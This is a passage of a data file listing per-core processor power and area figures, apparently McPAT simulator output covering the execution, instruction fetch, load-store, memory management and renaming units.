'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0478513,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.193947,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.027173,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.431382,
'Memory Management Unit/Runtime Dynamic': 0.0750243,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.011,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0355631,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00785215,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0837759,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.127191,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.30187,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0105276,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.210958,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0563895,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.170899,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.275654,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.139141,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.585694,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.186814,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.28804,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0106532,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00716827,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0557959,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0530138,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0664491,
'Execution Unit/Register Files/Runtime Dynamic': 0.0601821,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.120179,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.323037,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.58525,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00169386,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00169386,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00151699,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000610028,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000761547,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00566627,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0147528,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0509635,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.24172,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.178413,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.173095,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.61756,
'Instruction Fetch Unit/Runtime Dynamic': 0.42289,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0480074,
'L2/Runtime Dynamic': 0.0107323,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.89098,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.807362,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0535062,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0535061,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.14364,
'Load Store Unit/Runtime Dynamic': 1.12474,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.131937,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.263874,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0468249,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.047449,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.201558,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0295351,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.438104,
'Memory Management Unit/Runtime Dynamic': 0.0769841,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.1248,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0280241,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00805154,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0873152,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.123391,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.34399,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.00646735,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.207769,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0346438,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.184462,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.29753,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.150183,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.632175,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.205658,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.28652,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.00654495,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00773715,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0583819,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.057221,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0649268,
'Execution Unit/Register Files/Runtime Dynamic': 0.0649582,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.124611,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.333729,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.64401,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00204448,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00204448,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00183145,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000736725,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000821984,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00674239,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0177902,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.055008,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.49898,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.204523,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.186832,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.88731,
'Instruction Fetch Unit/Runtime Dynamic': 0.470895,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0413557,
'L2/Runtime Dynamic': 0.0090745,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.93601,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.829551,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0549632,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0549632,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.19556,
'Load Store Unit/Runtime Dynamic': 1.15557,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.13553,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.27106,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
